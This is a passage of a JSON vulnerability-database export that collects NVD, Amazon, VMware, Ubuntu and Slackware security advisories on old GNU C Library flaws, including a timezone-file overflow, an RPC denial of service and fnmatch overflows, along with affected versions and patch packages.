"cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.08:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.06:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:56", "description": "Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header.", "edition": 4, "cvss3": {}, "published": "2010-06-01T20:30:00", "title": "CVE-2010-0830", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0830"], "modified": "2017-08-17T01:32:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2010-0830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0830", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}], "amazon": [{"lastseen": "2020-11-10T12:35:04", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "description": "**Issue Overview:**\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2009-5029 __](<https://access.redhat.com/security/cve/CVE-2009-5029>))\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. ([CVE-2011-4609 __](<https://access.redhat.com/security/cve/CVE-2011-4609>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-debuginfo-common-2.12-1.47.32.amzn1.i686 \n glibc-common-2.12-1.47.32.amzn1.i686 \n glibc-debuginfo-2.12-1.47.32.amzn1.i686 \n glibc-devel-2.12-1.47.32.amzn1.i686 \n glibc-2.12-1.47.32.amzn1.i686 \n glibc-utils-2.12-1.47.32.amzn1.i686 \n nscd-2.12-1.47.32.amzn1.i686 \n glibc-headers-2.12-1.47.32.amzn1.i686 \n glibc-static-2.12-1.47.32.amzn1.i686 \n \n src: \n glibc-2.12-1.47.32.amzn1.src \n \n x86_64: \n glibc-devel-2.12-1.47.32.amzn1.x86_64 \n glibc-static-2.12-1.47.32.amzn1.x86_64 \n glibc-debuginfo-common-2.12-1.47.32.amzn1.x86_64 \n glibc-utils-2.12-1.47.32.amzn1.x86_64 \n glibc-common-2.12-1.47.32.amzn1.x86_64 \n glibc-headers-2.12-1.47.32.amzn1.x86_64 \n glibc-2.12-1.47.32.amzn1.x86_64 \n glibc-debuginfo-2.12-1.47.32.amzn1.x86_64 \n nscd-2.12-1.47.32.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-02-02T14:26:00", "published": "2012-02-02T14:26:00", "id": "ALAS-2012-039", "href": "https://alas.aws.amazon.com/ALAS-2012-39.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2012-0018\r\nSynopsis: VMware security updates for vCSA and ESXi\r\nIssue date: 2012-12-20\r\nUpdated on: 2012-12-20 (initial advisory)\r\nCVE numbers: ------------- vCSA ---------------\r\n CVE-2012-6324, CVE-2012-6325\r\n ------------- glibc --------------\r\n CVE-2009-5029, CVE-2009-5064, CVE-2010-0830,\r\n CVE-2011-1089, CVE-2011-4609, CVE-2012-0864,\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406,\r\n CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware has updated vCenter Server Appliance (vCSA) and ESX to \r\n address multiple security vulnerabilities\r\n\r\n2. Relevant releases\r\n\r\n vCenter Server Appliance 5.1 without Patch 1\r\n vCenter Server Appliance 5.0 without Update 2\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201212101\r\n VMware ESXi 5.0 without patch ESXi500-201212101\r\n\r\n3. Problem Description\r\n\r\n a. vCenter Server Appliance directory traversal\r\n\r\n The vCenter Server Appliance (vCSA) contains a directory\r\n traversal vulnerability that allows an authenticated \r\n remote user to retrieve arbitrary files. Exploitation of\r\n this issue may expose sensitive information stored on the \r\n server. \r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2012-6324 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux vCSA 5.1 Patch 1\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\n b. vCenter Server Appliance arbitrary file download\r\n\r\n The vCenter Server Appliance (vCSA) contains an XML parsing \r\n vulnerability that allows an authenticated remote user to\r\n retrieve arbitrary files. Exploitation of this issue may\r\n expose sensitive information stored on the server.\r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2012-6325 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux not affected\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\nc. Update to ESX glibc package\r\n\r\n The ESX glibc package is updated to version glibc-2.5-81.el5_8.1\r\n to resolve multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2009-5029, CVE-2009-5064,\r\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, CVE-2012-0864\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406 and CVE-2012-3480\r\n to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n ESXi 5.1 ESXi ESXi510-201212101\r\n ESXi 5.0 ESXi ESXi500-201212101\r\n ESXi 4.1 ESXi no patch planned\r\n ESXi 4.0 ESXi no patch planned\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX any ESX not applicable\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and\r\n version and verify the checksum of your downloaded file.\r\n\r\n\r\n ESXi and ESX\r\n ------------\r\n The download for ESXi includes vCenter Server Appliance.\r\n\r\n\r\n https://downloads.vmware.com/go/selfsupport-download\r\n\r\n ESXi 5.1\r\n http://kb.vmware.com/kb/2035775\r\n\r\n ESXi 5.0\r\n http://kb.vmware.com/kb/2033751\r\n\r\n5. References\r\n\r\n ------------- vCSA ---------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6324\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6325\r\n ------------- glibc --------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5064\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0830\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2012-12-20 VMSA-2012-0018\r\n Initial security advisory in conjunction with the release of\r\n vSphere 5.1 Patch 1 and vSphere 5.0 Update 2 on 2012-12-20.\r\n\r\n- --------------------------------------------------------------------\r\n\r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware security response policy\r\n http://www.vmware.com/support/policies/security_response.html\r\n\r\n General support life cycle policy\r\n http://www.vmware.com/support/policies/eos.html\r\n\r\n VMware Infrastructure support life cycle policy\r\n http://www.vmware.com/support/policies/eos_vi.html\r\n\r\n Copyright 2012 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 2599)\r\nCharset: utf-8\r\n\r\nwj8DBQFQ01bsDEcm8Vbi9kMRAkXEAJoClYysvoV67RKiZ0uN1YszPcN0LQCg8QMV\r\nOWjpV7Bnt27472i5EOhk9fI=\r\n=jrDP\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "SECURITYVULNS:DOC:28907", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28907", "title": "VMSA-2012-0018 VMware security updates for vCSA and ESXi", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1396-1\r\nMarch 09, 2012\r\n\r\neglibc, glibc vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities were discovered and fixed in the GNU C Library.\r\n\r\nSoftware Description:\r\n- eglibc: Embedded GNU C Library: sources\r\n- glibc: GNU C Library: Documentation\r\n\r\nDetails:\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\ninteger overflows in the timezone handling code. An attacker could use\r\nthis to possibly execute arbitrary code by convincing an application\r\nto load a maliciously constructed tzfile. (CVE-2009-5029)\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\npasswd.adjunct.byname map entries in the Network Information Service\r\n(NIS) code in the name service caching daemon (nscd). An attacker\r\ncould use this to obtain the encrypted passwords of NIS accounts.\r\nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\r\n\r\nChris Evans reported that the GNU C Library did not properly\r\ncalculate the amount of memory to allocate in the fnmatch() code. An\r\nattacker could use this to cause a denial of service or possibly\r\nexecute arbitrary code via a maliciously crafted UTF-8 string.\r\nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1071)\r\n\r\nTomas Hoger reported that an additional integer overflow was possible\r\nin the GNU C Library fnmatch() code. An attacker could use this to\r\ncause a denial of service via a maliciously crafted UTF-8 string. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\r\nand Ubuntu 11.04. (CVE-2011-1659)\r\n\r\nDan Rosenberg discovered that the addmntent() function in the GNU C\r\nLibrary did not report an error status for failed attempts to write to\r\nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab,\r\npossibly causing a denial of service or otherwise manipulate mount\r\noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS,\r\nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\r\n\r\nHarald van Dijk discovered that the locale program included with the\r\nGNU C library did not properly quote its output. This could allow a\r\nlocal attacker to possibly execute arbitrary code using a crafted\r\nlocalization string that was evaluated in a shell script. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1095)\r\n\r\nIt was discovered that the GNU C library loader expanded the\r\n$ORIGIN dynamic string token when RPATH is composed entirely of this\r\ntoken. This could allow an attacker to gain privilege via a setuid\r\nprogram that had this RPATH value. (CVE-2011-1658)\r\n\r\nIt was discovered that the GNU C library implementation of memcpy\r\noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3)\r\ncontained a possible integer overflow. An attacker could use this to\r\ncause a denial of service or possibly execute arbitrary code. This\r\nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\r\n\r\nJohn Zimmerman discovered that the Remote Procedure Call (RPC)\r\nimplementation in the GNU C Library did not properly handle large\r\nnumbers of connections. This could allow a remote attacker to cause\r\na denial of service. (CVE-2011-4609)\r\n\r\nIt was discovered that the GNU C Library vfprintf() implementation\r\ncontained a possible integer overflow in the format string protection\r\ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in\r\nconjunction with a format string vulnerability to bypass the format\r\nstring protection and possibly execute arbitrary code. (CVE-2012-0864)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libc6 2.13-20ubuntu5.1\r\n\r\nUbuntu 11.04:\r\n libc6 2.13-0ubuntu13.1\r\n\r\nUbuntu 10.10:\r\n libc-bin 2.12.1-0ubuntu10.4\r\n libc6 2.12.1-0ubuntu10.4\r\n\r\nUbuntu 10.04 LTS:\r\n libc-bin 2.11.1-0ubuntu7.10\r\n libc6 2.11.1-0ubuntu7.10\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu8.1\r\n\r\nAfter a standard system update you need to restart all services or\r\nreboot your computer to make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1396-1\r\n CVE-2009-5029, CVE-2010-0015, CVE-2011-1071, CVE-2011-1089,\r\n CVE-2011-1095, CVE-2011-1658, CVE-2011-1659, CVE-2011-2702,\r\n CVE-2011-4609, CVE-2012-0864\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-20ubuntu5.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-0ubuntu13.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.12.1-0ubuntu10.4\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.10\r\n https://launchpad.net/ubuntu/+source/glibc/2.7-10ubuntu8.1\r\n", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:DOC:27743", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27743", "title": "[USN-1396-1] GNU C Library vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-0296", "CVE-2010-0830"], "description": "Invalid mntent functions string processing, ELF format parsing memory corruption.", "edition": 1, "modified": "2010-05-27T00:00:00", "published": "2010-05-27T00:00:00", "id": "SECURITYVULNS:VULN:10874", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10874", "title": "GNU glibc library security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2011-2702"], "description": "memcpy() integer overflow, RPC DoS, vfprintf() integer overflow.", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12241", "title": "glibc multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6326", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "a. vCenter Server Appliance directory traversal \n \n\n\nThe vCenter Server Appliance (vCSA) contains a directory traversal vulnerability that allows an authenticated remote user to retrieve arbitrary files. Exploitation of this issue may expose sensitive information stored on the server. \n \nVMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-6324 to this issue. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 4, "modified": "2013-04-25T00:00:00", "published": "2012-12-20T00:00:00", "id": "VMSA-2012-0018", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0018.html", "title": "VMware security updates for vCSA, vCenter Server, and ESXi", "type": "vmware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:30:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "It was discovered that the GNU C Library did not properly handle \ninteger overflows in the timezone handling code. An attacker could use \nthis to possibly execute arbitrary code by convincing an application \nto load a maliciously constructed tzfile. (CVE-2009-5029)\n\nIt was discovered that the GNU C Library did not properly handle \npasswd.adjunct.byname map entries in the Network Information Service \n(NIS) code in the name service caching daemon (nscd). An attacker \ncould use this to obtain the encrypted passwords of NIS accounts. \nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\n\nChris Evans reported that the GNU C Library did not properly \ncalculate the amount of memory to allocate in the fnmatch() code. An \nattacker could use this to cause a denial of service or possibly \nexecute arbitrary code via a maliciously crafted UTF-8 string. \nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1071)\n\nTomas Hoger reported that an additional integer overflow was possible \nin the GNU C Library fnmatch() code. An attacker could use this to \ncause a denial of service via a maliciously crafted UTF-8 string. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 \nand Ubuntu 11.04. (CVE-2011-1659)\n\nDan Rosenberg discovered that the addmntent() function in the GNU C \nLibrary did not report an error status for failed attempts to write to \nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab, \npossibly causing a denial of service or otherwise manipulate mount \noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, \nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\n\nHarald van Dijk discovered that the locale program included with the \nGNU C library did not properly quote its output. This could allow a \nlocal attacker to possibly execute arbitrary code using a crafted \nlocalization string that was evaluated in a shell script. This \nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu \n10.10. (CVE-2011-1095)\n\nIt was discovered that the GNU C library loader expanded the \n$ORIGIN dynamic string token when RPATH is composed entirely of this \ntoken. This could allow an attacker to gain privilege via a setuid \nprogram that had this RPATH value. (CVE-2011-1658)\n\nIt was discovered that the GNU C library implementation of memcpy \noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3) \ncontained a possible integer overflow. An attacker could use this to \ncause a denial of service or possibly execute arbitrary code. This \nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\n\nJohn Zimmerman discovered that the Remote Procedure Call (RPC) \nimplementation in the GNU C Library did not properly handle large \nnumbers of connections. This could allow a remote attacker to cause \na denial of service. (CVE-2011-4609)\n\nIt was discovered that the GNU C Library vfprintf() implementation \ncontained a possible integer overflow in the format string protection \ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in \nconjunction with a format string vulnerability to bypass the format \nstring protection and possibly execute arbitrary code. (CVE-2012-0864)", "edition": 5, "modified": "2012-03-09T00:00:00", "published": "2012-03-09T00:00:00", "id": "USN-1396-1", "href": "https://ubuntu.com/security/notices/USN-1396-1", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029"], "description": "New glibc packages are available for Slackware 13.1, 13.37, and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/glibc-2.13-i486-5_slack13.37.txz: Rebuilt.\n Patched an overflow in tzfile. This was evidently first reported in\n 2009, but is only now getting around to being patched. To exploit it,\n one must be able to write beneath /usr/share/zoneinfo, which is usually\n not possible for a normal user, but may be in the case where they are\n chroot()ed to a directory that they own.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\n (* Security fix *)\npatches/packages/glibc-i18n-2.13-i486-5_slack13.37.txz: Rebuilt.\npatches/packages/glibc-profile-2.13-i486-5_slack13.37.txz: Rebuilt.\n (* Security fix *)\npatches/packages/glibc-solibs-2.13-i486-5_slack13.37.txz: Rebuilt.\n (* Security fix *)\npatches/packages/glibc-zoneinfo-2.13-noarch-5_slack13.37.txz: Rebuilt.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\n\nUpdated packages for Slackware 